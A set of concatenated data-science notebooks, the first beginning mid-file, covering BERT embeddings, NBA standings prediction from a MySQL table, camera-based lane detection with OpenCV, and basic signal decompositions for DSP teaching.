# + [markdown] colab_type="text" id="IFfVbmhfVBRl"
# ## Context embeddings
#
# GloVe and Fasttext are two examples of global embeddings, where the embeddings don't change even though the "sense" of the word might change given the context. This can be a problem for cases such as:
#
# - A **mouse** stole some cheese.
# - I bought a new **mouse** the other day for my computer.
#
# The word mouse can mean both an animal and a computer accessory depending on the context, yet with GloVe both senses receive exactly the same distributed representation. We can combat this by taking the surrounding words into account to create a context-sensitive embedding. Context embeddings such as BERT are really popular right now.
#
#
# + colab_type="code" id="v2Kqxd54VBRm" colab={}
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
model = BertModel.from_pretrained('bert-base-uncased')
model.eval()
def to_bert_embeddings(text, return_tokens=False):
if isinstance(text, list):
# Already tokenized
tokens = tokenizer.tokenize(' '.join(text))
else:
# Need to tokenize
tokens = tokenizer.tokenize(text)
tokens_with_tags = ['[CLS]'] + tokens + ['[SEP]']
indices = tokenizer.convert_tokens_to_ids(tokens_with_tags)
out = model(torch.LongTensor(indices).unsqueeze(0))
# Concatenate the last four layers and use that as the embedding
# source: https://jalammar.github.io/illustrated-bert/
embeddings_matrix = torch.stack(out[0]).squeeze(1)[-4:] # use last 4 layers
embeddings = []
for j in range(embeddings_matrix.shape[1]):
embeddings.append(embeddings_matrix[:, j, :].flatten().detach().numpy())
# Ignore [CLS] and [SEP]
embeddings = embeddings[1:-1]
if return_tokens:
assert len(embeddings) == len(tokens)
return embeddings, tokens
return embeddings
# + colab_type="code" id="W6PAaDILVBRq" colab={}
words_sentences = [
('mouse', 'I saw a mouse run off with some cheese.'),
('mouse', 'I bought a new computer mouse yesterday.'),
('cat', 'My cat jumped on the bed.'),
('keyboard', 'My computer keyboard broke when I spilled juice on it.'),
('dessert', 'I had a banana fudge sunday for dessert.'),
('dinner', 'What did you eat for dinner?'),
('lunch', 'Yesterday I had a bacon lettuce tomato sandwich for lunch. It was tasty!'),
('computer', 'My computer broke after the motherdrive was overloaded.'),
('program', 'I like to program in Java and Python.'),
('pasta', 'I like to put tomatoes and cheese in my pasta.'),
]
words = [words_sentence[0] for words_sentence in words_sentences]
sentences = [words_sentence[1] for words_sentence in words_sentences]
# + colab_type="code" id="KVSuEP8fVBRt" colab={}
embeddings_lst, tokens_lst = zip(*[to_bert_embeddings(sentence, return_tokens=True) for sentence in sentences])
words, tokens_lst, embeddings_lst = zip(*[(word, tokens, embeddings) for word, tokens, embeddings in zip(words, tokens_lst, embeddings_lst) if word in tokens])
# Convert tuples to lists
words, tokens_lst, embeddings_lst = map(list, [words, tokens_lst, embeddings_lst])
# + colab_type="code" id="SBCrt11cVBRw" colab={}
target_indices = [tokens.index(word) for word, tokens in zip(words, tokens_lst)]
# + colab_type="code" id="IT7nqNYbVBRz" colab={}
target_embeddings = [embeddings[idx] for idx, embeddings in zip(target_indices, embeddings_lst)]
# + colab_type="code" id="_x17Kq7mVBR1" colab={}
tsne_words_embedded = TSNE(n_components=2).fit_transform(target_embeddings)
x, y = zip(*tsne_words_embedded)
fig, ax = plt.subplots(figsize=(5, 10))
for word, tokens, x_i, y_i in zip(words, tokens_lst, x, y):
ax.scatter(x_i, y_i, c=RED)
ax.annotate(' '.join([f'$\\bf{x}$' if x == word else x for x in tokens]), (x_i, y_i))
ax.axis('off')
plt.show()
# + [markdown] colab_type="text" id="x64xA81sVBR6"
# ## Try-it-yourself
#
# - Use the Magnitude library to load other pretrained embeddings such as Fasttext
# - Try comparing the GloVe embeddings with the Fasttext embeddings by making t-SNE plots of both, or checking the similarity scores between the same set of words
# - Make t-SNE plots using your own words and categories
# + colab_type="code" id="QDP37tWKVBR7" colab={}
|
notebooks/pyTorch/2_embeddings.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# !pip install mysql-connector-python
import mysql.connector
# Connect to the MySQL server and select the players database
mydb = mysql.connector.connect(
host="localhost", #Leave as localhost for localserver
user="root",
passwd="",
database = "players" #Database name
)
Teams = ["MIL","TOR","GSW","DEN","HOU","PHI","POR","UTA","BOS","OKC","IND",
"LAC","SAS","BKN","ORL","DET","CHA","MIA","SAC","LAL","MIN",
"DAL","MEM","NOP","WAS","ATL","CHI","CLE","PHX","NYK"]
predictedStandings = []
players = []
playersTemp = []
playersTeam = []
for Team in Teams:
playersTemp = []
playersTeam = []
cursor = mydb.cursor()
sql = "SELECT * FROM nba20182019 WHERE Team = %s" #SELECT * FROM TableName
team = (Team, )
cursor.execute(sql, team)
playersTemp = cursor.fetchall()
for player in playersTemp:
playersTemp2 = [player[2],player[1],player[-2]]
playersTeam.append(playersTemp2)
players.append(playersTeam)
# +
def split(arr,low,high):
i = (low-1) #Index of smaller element
splitPoint = arr[high][-1]
for j in range(low,high):
if arr[j][-1] <= splitPoint:
# increment index of smaller element
i = i+1
arr[i],arr[j] = arr[j],arr[i]
arr[i+1],arr[high] = arr[high],arr[i+1]
return (i+1)
def quickSort(arr,low,high):
if low < high:
splitIndex = split(arr,low,high)
quickSort(arr, low, splitIndex-1)
        quickSort(arr, splitIndex+1, high)
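As a design note, the custom quicksort above can be replaced by Python's built-in sort with a key function, which orders the same `[name, value]` pairs in one line:

```python
# Equivalent one-liner using the standard library (sorts by the last element, descending)
standings = [["MIL", 95.2], ["TOR", 88.1], ["GSW", 99.0]]
standings.sort(key=lambda team: team[-1], reverse=True)
print(standings)  # [['GSW', 99.0], ['MIL', 95.2], ['TOR', 88.1]]
```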
# +
teamSize = 1
numTeams = 30
averageAccuracy = 30
finalTeamSize = 1
while teamSize < 16:
predictedStandings = []
accuracy = 0
for Team in players:
totalFER = 0
count = 0
for count in range(teamSize):
totalFER = totalFER + Team[count][2]
temp = [Team[0][0],totalFER]
predictedStandings.append(temp)
quickSort(predictedStandings,0,29)
predictedStandings.reverse()
count = 1
for Team in predictedStandings:
teamName = Team[0]
actualRank = Teams.index(teamName) + 1
rankDifference = actualRank - count
if rankDifference <= 0:
rankDifference = rankDifference * -1
accuracy = accuracy + rankDifference
count = count + 1
averageAccuracyTemp = accuracy / numTeams
print("Team Size: " + str(teamSize))
print("Average Accuracy: +/- " + str(averageAccuracyTemp) + " positions out of 30")
print(predictedStandings)
if averageAccuracyTemp <= averageAccuracy:
averageAccuracy = averageAccuracyTemp
finalTeamSize = teamSize
teamSize = teamSize + 1
print("Most Accurate Team Size: " + str(finalTeamSize))
print("Average Accuracy: " + str(100-averageAccuracy/numTeams*100) + "% or +/- " + str(averageAccuracy) + " positions out of 30.")
# -
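The accuracy metric computed in the loop above is the mean absolute difference between each team's predicted and actual rank. A toy illustration with a four-team placeholder list:

```python
actual = ["MIL", "TOR", "GSW", "DEN"]     # actual order (rank = index + 1)
predicted = ["TOR", "MIL", "GSW", "DEN"]  # order produced by the model
rank_errors = [abs(actual.index(team) - i) for i, team in enumerate(predicted)]
print(sum(rank_errors) / len(predicted))  # 0.5
```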
Teams = ["MIL","TOR","GSW","DEN","HOU","PHI","POR","UTA","BOS","OKC","IND",
"LAC","SAS","BKN","ORL","DET","CHA","MIA","SAC","LAL","MIN",
"DAL","MEM","NOP","WAS","ATL","CHI","CLE","PHX","NYK"]
predictedStandings = []
players = []
playersTemp = []
playersTeam = []
for Team in Teams:
playersTemp = []
playersTeam = []
cursor = mydb.cursor()
sql = "SELECT * FROM nba20192020 WHERE Team = %s"
team = (Team, )
cursor.execute(sql, team)
playersTemp = cursor.fetchall()
for player in playersTemp:
playersTemp2 = [player[2],player[1],player[-2]]
playersTeam.append(playersTemp2)
players.append(playersTeam)
teamSize = 2 #Use most accurate team size found in the last cell
numTeams = 30
predictedStandings = []
for Team in players:
totalFER = 0
count = 0
for count in range(teamSize):
totalFER = totalFER + Team[count][2]
temp = [Team[0][0],totalFER]
predictedStandings.append(temp)
quickSort(predictedStandings,0,29)
predictedStandings.reverse()
predictedStandings
|
NBAPlayoffStatsRead.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [conda env:root]
# language: python
# name: conda-root-py
# ---
# ## Advanced Lane Finding Project
#
# The goals / steps of this project are the following:
#
# * Compute the camera calibration matrix and distortion coefficients given a set of chessboard images.
# * Apply a distortion correction to raw images.
# * Use color transforms, gradients, etc., to create a thresholded binary image.
# * Apply a perspective transform to rectify binary image ("birds-eye view").
# * Detect lane pixels and fit to find the lane boundary.
# * Determine the curvature of the lane and vehicle position with respect to center.
# * Warp the detected lane boundaries back onto the original image.
# * Output visual display of the lane boundaries and numerical estimation of lane curvature and vehicle position.
# ## Initialization
# +
import numpy as np # For numerical calculations
import cv2 # For OpenCV libraries
import glob # For group input of images
import matplotlib.pyplot as plt # Plotting library
# %matplotlib qt
# For video IO and processing
from moviepy.editor import VideoFileClip
from IPython.display import HTML
# -
# ## 1. Camera Calibration using Chessboard Images
def cameraCalibration():
# Using checkerboard images with 9x6 number of inside indices
objp = np.zeros((6*9,3), np.float32)
objp[:,:2] = np.mgrid[0:9,0:6].T.reshape(-1,2)
# Arrays to store object points and image points from all the images.
objpoints = [] # 3d points in real world space
imgpoints = [] # 2d points in image plane.
# Make a list of calibration images
images = glob.glob('camera_cal/calibration*.jpg')
# Step through the list and search for chessboard corners
for fname in images:
        img = cv2.imread(fname) # Read each frame as an image
        gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY) # Convert to grayscale
img_size = (gray.shape[1], gray.shape[0])
# Find the chessboard corners
ret, corners = cv2.findChessboardCorners(gray, (9,6),None)
# If found, add object points, image points
if ret == True:
objpoints.append(objp)
imgpoints.append(corners)
# Use all found corners and image points
ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1], None, None)
return mtx, dist
# ## 2. Distortion Correction
def undistort(img, mtx, dist):
# Use generated parameters to undistort each image without recalculating coefficients
undistorted = cv2.undistort(img, mtx, dist, None, mtx)
return undistorted
# ## 3. Color/Gradient Thresholds with Gaussian Blur
def colorGradient(img, s_thresh=(170, 255), sx_thresh=(21, 100)):
copy = np.copy(img)
    # Use kernel size to filter out noise
kernel_size = 11
blur = cv2.GaussianBlur(copy, (kernel_size, kernel_size), 0)
    # Convert to HLS color space and separate the L and S channels
hls = cv2.cvtColor(blur, cv2.COLOR_RGB2HLS)
l_channel = hls[:,:,1]
s_channel = hls[:,:,2]
# Sobel x
sobelx = cv2.Sobel(l_channel, cv2.CV_64F, 1, 0) # Take the derivative in x
abs_sobelx = np.absolute(sobelx) # Absolute x derivative to accentuate lines away from horizontal
scaled_sobel = np.uint8(255*abs_sobelx/np.max(abs_sobelx))
# Threshold x gradient
sxbinary = np.zeros_like(scaled_sobel)
sxbinary[(scaled_sobel >= sx_thresh[0]) & (scaled_sobel <= sx_thresh[1])] = 1
# Threshold color channel
s_binary = np.zeros_like(s_channel)
s_binary[(s_channel >= s_thresh[0]) & (s_channel <= s_thresh[1])] = 1
# Stack each channel
color_binary = np.zeros_like(s_channel)
color_binary[(s_binary == 1) | (sxbinary == 1)] = 1
return color_binary
# ## 4. Perspective Transform (Bird's Eye View)
# Define a function that takes an image, number of x and y points,
# camera matrix and distortion coefficients
def perspectiveTransform(img):
# Estimated source and destination values for a bird's eye view of the road
# Values were determined using estimates from two straight line images
h = img.shape[0]
w = img.shape[1]
img_size = (w,h)
mid_offset = 90
# Top left, top right, bottom left, bottom right
src = np.float32([[w/2-mid_offset, 460], [w/2+mid_offset, 460], [0, h-15], [w, h-15]])
dst = np.float32([[0, 0], [w, 0], [0, h], [w, h]])
# Given src and dst points, calculate the perspective transform matrix
M = cv2.getPerspectiveTransform(src, dst)
# Warp the image using OpenCV warpPerspective()
transformed = cv2.warpPerspective(img, M, img_size, flags=cv2.INTER_LINEAR)
# Return the resulting image and matrix
return transformed
# ## 5. Lane Boundary Detection and Vehicle Position
def detectLane(image, left_fit, right_fit):
# Check if this is the first iteration -> Use windows and histograms
if (left_fit == [0,0,0] and right_fit == [0,0,0]):
# Find our lane pixels first
leftx, lefty, rightx, righty = windowHistograms(image)
else:
leftx, lefty, rightx, righty = searchAroundPoly(image, left_fit, right_fit)
# Obtain polynomial coefficients in both pixels and meters
left_fitx, right_fitx, left_fit_rw, right_fit_rw, ploty = fit_poly(image.shape, leftx, lefty, rightx, righty)
# Calculate curvature in meters
curvature = measure_curvature_real(ploty, left_fit_rw, right_fit_rw)
# Calculate offset in meters using the meters per pixel ratio
# Assumption: Center of the image/video is the center of the car
xm_per_pix = 3.7/700 # meters per pixel in x dimension
offset = (640 - (left_fitx[-1] + right_fitx[-1])/2)*xm_per_pix
# Visualization using generated polynomial lane curve estimates
margin = 30 # Pixels on each side of the polynomial curve
out_img = np.dstack((image, image, image))*255
# Generate a polygon to illustrate the search window area
# And recast the x and y points into usable format for cv2.fillPoly()
# Left Lane
left_line_window1 = np.array([np.transpose(np.vstack([left_fitx-margin, ploty]))])
left_line_window2 = np.array([np.flipud(np.transpose(np.vstack([left_fitx+margin,
ploty])))])
left_line_pts = np.hstack((left_line_window1, left_line_window2))
# Right Lane
right_line_window1 = np.array([np.transpose(np.vstack([right_fitx-margin, ploty]))])
right_line_window2 = np.array([np.flipud(np.transpose(np.vstack([right_fitx+margin,
ploty])))])
right_line_pts = np.hstack((right_line_window1, right_line_window2))
# Central (Safe) Area
center_window1 = np.array([np.transpose(np.vstack([left_fitx+margin, ploty]))])
center_window2 = np.array([np.flipud(np.transpose(np.vstack([right_fitx-margin,
ploty])))])
center_pts = np.hstack((center_window1, center_window2))
# Draw the lane onto the warped blank image
cv2.fillPoly(out_img, np.int_([left_line_pts]), (255, 0, 0))
cv2.fillPoly(out_img, np.int_([right_line_pts]), (0, 0, 255))
cv2.fillPoly(out_img, np.int_([center_pts]), (0, 255, 0))
return out_img, left_fit, right_fit, curvature, offset
def fit_poly(img_shape, leftx, lefty, rightx, righty):
# Fit a second order polynomial for both the left and right lane data points
left_fit = np.polyfit(lefty, leftx, 2)
right_fit = np.polyfit(righty, rightx, 2)
# Generate x and y values for plotting
ploty = np.linspace(0, img_shape[0]-1, img_shape[0] )
try:
left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]
right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]
except TypeError:
        # Avoids an error if `left_fit` and `right_fit` are still None or incorrect
print('The function failed to fit a line!')
left_fitx = 1*ploty**2 + 1*ploty
right_fitx = 1*ploty**2 + 1*ploty
# For the real-world polyfit
ym_per_pix = 30/720 # meters per pixel in y dimension
xm_per_pix = 3.7/700 # meters per pixel in x dimension
left_fit_rw = np.polyfit(lefty*ym_per_pix, leftx*xm_per_pix, 2)
right_fit_rw = np.polyfit(righty*ym_per_pix, rightx*xm_per_pix, 2)
return left_fitx, right_fitx, left_fit_rw, right_fit_rw, ploty
def windowHistograms(image):
# Take a histogram of the bottom half of the image
histogram = np.sum(image[image.shape[0]//2:,:], axis=0)
# Find the peak of the left and right halves of the histogram
# These will be the starting point for the left and right lines
    midpoint = histogram.shape[0]//2
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:]) + midpoint
    # Hyperparameters
# Choose the number of sliding windows
nwindows = 9
# Set the width of the windows +/- margin
margin = 80
# Set minimum number of pixels found to recenter window
minpix = 30
# Set height of windows - based on nwindows above and image shape
    window_height = image.shape[0]//nwindows
# Identify the x and y positions of all nonzero pixels in the image
nonzero = image.nonzero()
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
# Current positions to be updated later for each window in nwindows
leftx_current = leftx_base
rightx_current = rightx_base
# Create empty lists to receive left and right lane pixel indices
left_lane_inds = []
right_lane_inds = []
# Step through the windows one by one
for window in range(nwindows):
# Identify window boundaries in x and y (and right and left)
win_y_low = image.shape[0] - (window+1)*window_height
win_y_high = image.shape[0] - window*window_height
win_xleft_low = leftx_current - margin
win_xleft_high = leftx_current + margin
win_xright_low = rightx_current - margin
win_xright_high = rightx_current + margin
# Identify non-zero pixels that are within the window bounds for each window
good_left_inds = ((nonzeroy < win_y_high) & (nonzeroy >= win_y_low) &
(nonzerox < win_xleft_high) & (nonzerox >= win_xleft_low)).nonzero()[0]
        good_right_inds = ((nonzeroy < win_y_high) & (nonzeroy >= win_y_low) &
                           (nonzerox < win_xright_high) & (nonzerox >= win_xright_low)).nonzero()[0]
# Append these indices to the lists
left_lane_inds.append(good_left_inds)
right_lane_inds.append(good_right_inds)
# Change the next rectangle's center location if the number of detected pixels
# exceed the minimum threshold
if (len(good_left_inds) > minpix):
            leftx_current = int(np.mean(nonzerox[good_left_inds]))
if (len(good_right_inds) > minpix):
            rightx_current = int(np.mean(nonzerox[good_right_inds]))
# Concatenate the arrays of indices (previously was a list of lists of pixels)
try:
left_lane_inds = np.concatenate(left_lane_inds)
right_lane_inds = np.concatenate(right_lane_inds)
except ValueError:
# Avoids an error if the above is not implemented fully
pass
# Extract left and right line pixel positions
leftx = nonzerox[left_lane_inds]
lefty = nonzeroy[left_lane_inds]
rightx = nonzerox[right_lane_inds]
righty = nonzeroy[right_lane_inds]
return leftx, lefty, rightx, righty
def searchAroundPoly(image, left_fit, right_fit):
    # Hyperparameter - width of the search area around the polynomial curve
margin = 60
# Grab activated pixels
    nonzero = image.nonzero()
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
# Calculate indices that fit within the margins of the polynomial curve
left_margins = left_fit[0]*(nonzeroy**2) + left_fit[1]*nonzeroy + left_fit[2]
right_margins = right_fit[0]*(nonzeroy**2) + right_fit[1]*nonzeroy + right_fit[2]
left_lane_inds = ((nonzerox < left_margins + margin) & (nonzerox > left_margins
- margin))
right_lane_inds = ((nonzerox < right_margins + margin) & (nonzerox > right_margins
- margin))
# Extract left and right line pixel positions
leftx = nonzerox[left_lane_inds]
lefty = nonzeroy[left_lane_inds]
rightx = nonzerox[right_lane_inds]
righty = nonzeroy[right_lane_inds]
return leftx, lefty, rightx, righty
# ## 6. Lane Curvature
def measure_curvature_real(ploty, left_fit, right_fit):
# Using the left/right fit in meters, calculate the curvature at the bottom of the image
y_eval = np.max(ploty)
# Using the curve as f(y) = Ay^2 + By + C:
# The curvature can be estimated as: (1+(2Ay+B)^2)^(3/2)/|2A|
left_curverad = ((1 + (2*left_fit[0]*y_eval + left_fit[1])**2)**1.5) / np.absolute(2*left_fit[0])
right_curverad = ((1 + (2*right_fit[0]*y_eval + right_fit[1])**2)**1.5) / np.absolute(2*right_fit[0])
    return int((left_curverad + right_curverad)//2)
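# As a sanity check on the curvature formula, fitting a quadratic to points sampled from a circle of known radius should recover that radius. The sketch below uses a hypothetical 500 m circle and is independent of the pipeline above.

```python
import numpy as np

# Points on a circle of radius R through the origin, curving in +x;
# a shallow arc keeps x = f(y) single-valued and nearly quadratic.
R = 500.0
theta = np.linspace(-0.15, 0.15, 50)
y = R * np.sin(theta)
x = R * (1 - np.cos(theta))

# Fit x = A*y^2 + B*y + C and evaluate R = (1 + (2Ay + B)^2)^(3/2) / |2A| at y = 0
A, B, C = np.polyfit(y, x, 2)
radius_est = (1 + (2 * A * 0 + B)**2)**1.5 / np.abs(2 * A)
print(radius_est)  # close to 500 for a shallow arc
```

The estimate drifts as the arc grows, because the quadratic model only approximates a circle locally; this is why the pipeline evaluates the curvature at a single `y_eval`.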
# ## 7. Inverse Perspective Transform and Text Overlay
def inversePerspectiveTransform(img):
# Estimated source and destination values for a bird's eye view of the road
# Values were determined using estimates from two straight line images
h = img.shape[0]
w = img.shape[1]
img_size = (w,h)
mid_offset = 90
# Top left, top right, bottom left, bottom right
src = np.float32([[w/2-mid_offset, 460], [w/2+mid_offset, 460], [0, h-15], [w, h-15]])
dst = np.float32([[0, 0], [w, 0], [0, h], [w, h]])
# Given src and dst points, calculate the perspective transform matrix
Minv = cv2.getPerspectiveTransform(dst, src)
# Warp the image using OpenCV warpPerspective()
transformed = cv2.warpPerspective(img, Minv, img_size, flags=cv2.INTER_LINEAR)
# Return the resulting image and matrix
return transformed
def addText(img, curvature, offset):
# Font and sizes is a default CV2 font
font = cv2.FONT_HERSHEY_SIMPLEX
# Positioned to be in the top left corner with 50px margins
bottomLeftCornerOfText1 = (50,50)
bottomLeftCornerOfText2 = (50,100)
fontScale = 1
# White color
fontColor = (255,255,255)
lineType = 2
# Depending on the vehicle offset, different words are used to maintain a positive value shown
if (offset == 0):
text1 = f"Radius of Curvature = {curvature}m"
text2 = "Vehicle is centered"
elif (offset < 0):
offset = np.abs(offset)
text1 = f"Radius of Curvature = {curvature}m"
        text2 = f"Vehicle is {offset:.2f}m left of center"
else:
text1 = f"Radius of Curvature = {curvature}m"
        text2 = f"Vehicle is {offset:.2f}m right of center"
# Text is placed onto the image and returned
cv2.putText(img, text1, bottomLeftCornerOfText1, font, fontScale, fontColor, lineType)
cv2.putText(img, text2, bottomLeftCornerOfText2, font, fontScale, fontColor, lineType)
# ## Full Image Processing
def process_image(img):
# Uses the left and right fits
global left_fit, right_fit
    # Calibrate the camera to fix distortions using checkerboard patterns taken from the same camera
mtx, dist = cameraCalibration()
calibrated = undistort(img, mtx, dist)
# Pipeline for color and gradient thresholding for a binary image of detected pixels
binary = colorGradient(calibrated)
# Perspective transform binary pixels into a bird's eye view
transformed = perspectiveTransform(binary)
    # Lane is detected using sliding windows or a search around the previous polynomial fit, depending on whether this is the first iteration
curve, left_fit, right_fit, curvature, offset = detectLane(transformed, left_fit, right_fit)
# Inverse transform the image back to the original shape
inverse = inversePerspectiveTransform(curve)
# Add the text for curvature and car position offset
addText(img, curvature, offset)
# The detected lane markings are overlaid with a 50% opacity before returning
result = cv2.addWeighted(img, 1, inverse, 0.5, 0)
return result
# Testing Purposes only
left_fit = [0,0,0]
right_fit = [0,0,0]
img = cv2.imread('test_images/test5.jpg')
out = process_image(img)
cv2.imwrite('report_images/final_image.jpg', out)
cv2.imshow('image', out)
# ### Applied to a Video
# left_fit = [0,0,0]
# right_fit = [0,0,0]
# video_output = 'project_video_output.mp4'
#
# clip = VideoFileClip("project_video.mp4")
# video_clip = clip.fl_image(process_image)
# # %time video_clip.write_videofile(video_output, audio=False)
# HTML("""
# <video width="1280" height="720" controls>
# <source src="{0}">
# </video>
# """.format(video_output))
project_2_advanced_lane_finder.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Common Decompositions
# The goal of this method is to replace a complicated problem with several easy ones. If the decomposition doesn't simplify the situation in some way, then nothing has been gained. In this notebook, four types of decompositions are presented:
#
# 1. Impulse Decomposition
# 2. Step Decomposition
# 3. Even/Odd Decomposition
# 4. Interlaced Decomposition
# +
import sys
sys.path.insert(0, '../../')
import numpy as np
import matplotlib.pyplot as plt
from Common import common_plots
cplots = common_plots.Plot()
# -
x = np.array([[4,2,-3,6,1,7,-4, 3]])
#x = np.random.rand(1,15)
cplots.plot_single(x)
# ## 1. Impulse Decomposition
# Impulse decomposition breaks an $N$ samples signal into $N$ component signals, each containing $N$ samples. Each of the component signals contains one point from the original signal, with the remainder of the values being zero. A single nonzero point in a string of zeros is called an impulse. Impulse decomposition is important because it **allows signals to be examined one sample at a time**. Similarly, systems are characterized by how they respond to impulses. By knowing how a system responds to an impulse, the system's output can be calculated for any given input.
N = x.shape[1]
x_impulse = np.zeros((N,N))
# +
for i in range(N):
x_impulse[i][i]=x[0][i]
print(x_impulse)
# -
cplots.plot_multiple(x_impulse)
# ## 2. Step Decomposition
# Step decomposition also breaks an $N$ sample signal into $N$ component signals, each composed of $N$ samples. Each component signal is a step, that is, the first samples have a value of zero, while the last samples are some constant value. Consider the decomposition of an $N$ point signal, $x[n]$, into the components: $x_0[n], x_1[n], x_2[n], \dots, x_{N-1}[n]$. The $k^{th}$ component signal, $x_k[n]$, is composed of zeros for points $0$ through $k - 1$, while the remaining points have a value of: $x[k] - x[k-1]$.
x_step = np.zeros((N,N))
x_step[0][:] = x[0][0]
for i in range(1,N):
x_step[i][i:] = x[0][i]-x[0][i-1]
print(x_step)
cplots.plot_multiple(x_step)
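# Because the step heights telescope, the $N$ components should sum back to the original signal. A quick standalone check (repeating the construction above so it runs on its own):

```python
import numpy as np

x = np.array([[4, 2, -3, 6, 1, 7, -4, 3]], dtype=float)
N = x.shape[1]
x_step = np.zeros((N, N))
x_step[0][:] = x[0][0]
for i in range(1, N):
    x_step[i][i:] = x[0][i] - x[0][i-1]

# The telescoping sum x[0] + (x[1]-x[0]) + ... + (x[n]-x[n-1]) equals x[n]
print(np.allclose(x_step.sum(axis=0), x[0]))  # True
```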
# ## 3. Even/Odd Decomposition
# The even/odd decomposition breaks a signal into two component signals, one having **even symmetry** and the other having **odd symmetry**. An N point signal is said to have even symmetry if it is a mirror image around point $N/2$. Odd symmetry occurs when the matching points have equal magnitudes but are opposite in sign.
#
# The following definitions assume that the signal is composed of an **even number of samples**, and that the indexes run from $0$ to $N-1$. The decomposition is calculated from the relations:
#
# $$x_E[n]=\frac{x[n]+x[N-n]}{2}$$
#
# $$x_O[n]=\frac{x[n]-x[N-n]}{2}$$
def circular_flip(x):
"""
Function that flips an array x in a circular form.
Parameters:
x (numpy array): Array of numbers representing the input signal to be transformed.
Returns:
numpy array: Returns flipped values of an input x in the form [x[0], x[N-1], x[N-2] ... x[1]]
"""
return np.insert(np.flip(x[0][1:]).reshape(-1),0,x[0][0])
# +
x = np.array([[0,1,2,3,4,5]])
x_N = circular_flip(x)
x_E = (x + x_N)/2.0
x_O = (x - x_N)/2.0
# +
plt.rcParams["figure.figsize"] = (15,5)
plt.subplot(1,3,1)
cplots.plot_single(x_E, "Even Decomposition of x")
plt.subplot(1,3,2)
cplots.plot_single(x_O, "Odd Decomposition of x")
plt.subplot(1,3,3)
cplots.plot_single(x_E + x_O, "Signal x")
# -
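# A quick standalone check of the symmetry properties (using plain NumPy, without the plotting helpers): the even part should be a circular mirror image of itself, the odd part its own negation, and their sum should reconstruct the signal.

```python
import numpy as np

x = np.array([0., 1., 2., 3., 4., 5.])
N = len(x)
flip = (N - np.arange(N)) % N        # circular flip indices: 0, N-1, ..., 1
x_E = (x + x[flip]) / 2
x_O = (x - x[flip]) / 2

print(np.allclose(x_E, x_E[flip]))   # even symmetry: True
print(np.allclose(x_O, -x_O[flip]))  # odd symmetry: True
print(np.allclose(x_E + x_O, x))     # perfect reconstruction: True
```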
# For an **odd number of samples**, with the indexes running from $0$ to $N-1$, the decomposition is calculated as follows:
# +
x = np.array([[0,1,2,3,4,5,6]])
x_N = np.flip(x) #Note that there is no circular flip
x_E = (x + x_N)/2.0
x_O = (x - x_N)/2.0
# +
plt.rcParams["figure.figsize"] = (15,5)
plt.subplot(1,3,1)
cplots.plot_single(x_E, "Even Decomposition of x")
plt.ylim((-1,4))
plt.subplot(1,3,2)
cplots.plot_single(x_O, "Odd Decomposition of x")
plt.subplot(1,3,3)
cplots.plot_single(x_E + x_O, "Signal x")
# -
# ## 4. Interlaced Decomposition
# The interlaced decomposition breaks the signal into two component signals, the even sample signal and the odd sample signal (not to be confused with even and odd symmetry signals). To find the even sample signal, start with the original signal and set all of the odd numbered samples to zero. To find the odd sample signal, start with the original signal and set all of the even numbered samples to zero.
#
# At first glance, this decomposition might seem trivial and uninteresting. This is ironic, because the interlaced decomposition is the basis for an extremely important algorithm in DSP, the Fast Fourier Transform (FFT). The procedure for calculating the Fourier decomposition has been known for several hundred years. Unfortunately, it is frustratingly slow, often requiring minutes or hours to execute on present day computers. The FFT is a family of algorithms developed in the 1960s to reduce this computation time. The strategy is an exquisite example of DSP: **reduce the signal to elementary components by repeated use of the interlace transform**; **calculate the Fourier decomposition of the individual components**; **synthesize the results into the final answer**. The results are dramatic; it is common for the speed to be improved by a factor of hundreds or thousands.
# +
x_E = np.zeros(x.shape)
x_O = np.zeros(x.shape)
x_E[0][::2]=x[0][::2]
x_O[0][1::2]=x[0][1::2]
# +
plt.rcParams["figure.figsize"] = (15,5)
plt.subplot(1,3,1)
cplots.plot_single(x_E, "Even Decomposition of x")
plt.subplot(1,3,2)
cplots.plot_single(x_O, "Odd Decomposition of x")
plt.subplot(1,3,3)
cplots.plot_single(x_E + x_O, "Signal x")
# -
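# The FFT strategy described above can be sketched as a minimal recursive radix-2 Cooley-Tukey implementation, where each level applies exactly this interlaced decomposition. This is an illustrative sketch (it assumes the length is a power of two), not an optimized implementation:

```python
import numpy as np

def fft_recursive(x):
    N = len(x)
    if N == 1:
        return x.astype(complex)
    even = fft_recursive(x[::2])    # even-indexed (interlaced) samples
    odd = fft_recursive(x[1::2])    # odd-indexed (interlaced) samples
    twiddle = np.exp(-2j * np.pi * np.arange(N // 2) / N)
    # Combine the two half-size spectra into the full spectrum
    return np.concatenate([even + twiddle * odd,
                           even - twiddle * odd])

x = np.array([4., 2., -3., 6., 1., 7., -4., 3.])
print(np.allclose(fft_recursive(x), np.fft.fft(x)))  # True
```

Each recursion halves the problem, which is where the speedup over the direct $O(N^2)$ Fourier decomposition comes from.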
# ## Exercise for Common Decompositions
# For a given input signal x calculate the:
# 1. Impulse Decomposition
# 2. Step Decomposition
# 3. Even/Odd Decomposition
# 4. Interlaced Decomposition
#
# by calling the functions `impulse`, `step`, `even_odd` and `interlaced`
# +
def impulse(x):
"""
Function that calculates the impulse decomposition of a signal x.
Parameters:
x (numpy array): Array of numbers representing the input signal to be decomposed.
Returns:
numpy array: Returns a matrix of size x.shape[1] by x.shape[1] where each row represents
the impulse decomposition of the n-th sample.
"""
impulse_decomposition = None
return impulse_decomposition
def step(x):
"""
Function that calculates the step decomposition of a signal x.
Parameters:
